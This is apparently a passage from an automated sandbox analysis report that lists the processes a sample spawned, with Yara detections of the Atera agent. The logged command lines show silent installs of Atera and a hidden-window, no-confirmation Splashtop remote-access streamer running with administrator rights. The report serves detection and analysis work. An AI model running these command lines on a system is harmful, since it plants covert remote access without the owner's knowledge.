                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2420250702.0000022B81FA0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2420250702.0000022B81FAC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2420250702.0000022B81FED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2437952320.0000022B828B8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2437952320.0000022B828AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2437952320.0000022B82681000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2437952320.0000022B828AC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2437952320.0000022B828AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:48
                                                                                                                                                                                                                                                                                              Start time:06:59:11
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:49
                                                                                                                                                                                                                                                                                              Start time:06:59:11
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe" 52187e48-563c-468d-9785-3542f81fb412 "625a9ffc-3a6c-4d9d-b846-9cb0081c4ad4" agent-api.atera.com/Production 443 or8ixLi90Mf "syncinstalledapps" 001Q300000P2oAPIAZ
                                                                                                                                                                                                                                                                                              Imagebase:0x153fcb70000
                                                                                                                                                                                                                                                                                              File size:57'896 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:CB9890B01A396F64D702AD10F441003A
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.000001538094B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2967276692.00000153FCD97000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.000001538097D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.000001538066A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2971911829.00000153FCFA0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.0000015380680000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.000001538095A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.00000153809CB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000000.2383010410.00000153FCB72000.00000002.00000001.01000000.0000002B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.00000153805B3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.0000015380985000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.000001538047E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2967276692.00000153FCD4E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.00000153802B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.00000153806B7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.00000153805E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2967276692.00000153FCD18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2967276692.00000153FCDD6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.00000153805C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.000001538059E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.00000153804BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.000001538063F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.0000015380590000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2972609455.00000153FD172000.00000002.00000001.01000000.00000049.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2976094132.00000153FD49F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2967276692.00000153FCD2F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2981477200.00000153FE0A7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.00000153803ED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2981477200.00000153FE030000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.000001538023D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.0000015380954000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.0000015380629000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.0000015380589000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2973645453.00000153FD415000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.00000153806F4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2967276692.00000153FCD58000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2967276692.00000153FCD10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.0000015380505000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.0000015380001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:50
                                                                                                                                                                                                                                                                                              Start time:06:59:11
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:51
                                                                                                                                                                                                                                                                                              Start time:06:59:12
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:52
                                                                                                                                                                                                                                                                                              Start time:06:59:12
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"msiexec.exe" /i C:\Windows\TEMP\ateraAgentSetup64_1_8_7_2.msi /lv* AteraSetupLog.txt /qn /norestart
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7da920000
                                                                                                                                                                                                                                                                                              File size:69'632 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000034.00000003.2711792787.00000269218B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000034.00000003.2713795666.0000026922065000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000034.00000003.2750455725.00000269218B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000034.00000003.2755592246.00000269215EF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000034.00000003.2714070273.0000026922065000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000034.00000002.2756832344.00000269215F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000034.00000003.2610750893.0000026922063000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000034.00000003.2755507357.00000269215DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:53
                                                                                                                                                                                                                                                                                              Start time:06:59:13
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 512046948B0983DC32EDE392DA99D036 E Global\MSI0000
                                                                                                                                                                                                                                                                                              Imagebase:0x2b0000
                                                                                                                                                                                                                                                                                              File size:59'904 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:54
                                                                                                                                                                                                                                                                                              Start time:06:59:13
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:rundll32.exe "C:\Windows\Installer\MSI5085.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6967703 37 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                                                                                                                                                                                                                                                                                              Imagebase:0x880000
                                                                                                                                                                                                                                                                                              File size:61'440 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000003.2409510449.0000000004044000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:55
                                                                                                                                                                                                                                                                                              Start time:06:59:15
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:rundll32.exe "C:\Windows\Installer\MSI5885.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6969500 41 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
                                                                                                                                                                                                                                                                                              Imagebase:0x880000
                                                                                                                                                                                                                                                                                              File size:61'440 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000037.00000002.2573114268.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000037.00000002.2573114268.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000037.00000003.2425788970.00000000047F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:56
                                                                                                                                                                                                                                                                                              Start time:06:59:19
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\Temp\SplashtopStreamer.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:"C:\Windows\TEMP\SplashtopStreamer.exe" prevercheck /s /i sec_opt=0,confirm_d=0,hidewindow=1
                                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                                              File size:56'907'920 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:9CD6BA3AD27DAC967F073CBCAD88FEF9
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000038.00000002.2594283775.00000000001D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000038.00000002.2600454958.0000000000570000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:57
                                                                                                                                                                                                                                                                                              Start time:06:59:21
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe" 52187e48-563c-468d-9785-3542f81fb412 "c714c0bb-2ce8-418e-929f-2ec4a445cfb0" agent-api.atera.com/Production 443 or8ixLi90Mf "probe" 001Q300000P2oAPIAZ
                                                                                                                                                                                                                                                                                              Imagebase:0x25fbf120000
                                                                                                                                                                                                                                                                                              File size:51'752 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:5BB0687E2384644EA48F688D7E75377B
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2544967022.0000025FD83A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2530880306.0000025FBF520000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2513781301.0000025FBF362000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2513781301.0000025FBF320000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2537521563.0000025FBFBCE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2534525146.0000025FBFA22000.00000002.00000001.01000000.0000003D.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2513781301.0000025FBF32C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2537521563.0000025FBFAE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2544967022.0000025FD83E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2513781301.0000025FBF3AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000000.2484363303.0000025FBF122000.00000002.00000001.01000000.0000003C.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2537521563.0000025FBFB5C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:58
                                                                                                                                                                                                                                                                                              Start time:06:59:22
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:60
                                                                                                                                                                                                                                                                                              Start time:06:59:22
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" 52187e48-563c-468d-9785-3542f81fb412 "f6b70a2c-1bfd-4903-a0e1-81c5afac28c1" agent-api.atera.com/Production 443 or8ixLi90Mf "monitor" 001Q300000P2oAPIAZ
                                                                                                                                                                                                                                                                                              Imagebase:0x29e21210000
                                                                                                                                                                                                                                                                                              File size:407'080 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:810F893E58861909B134FA72E3BC90CD
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2941928264.00007FFDF08E9000.00000004.00000001.01000000.0000001E.sdmp, Author: Joe Security
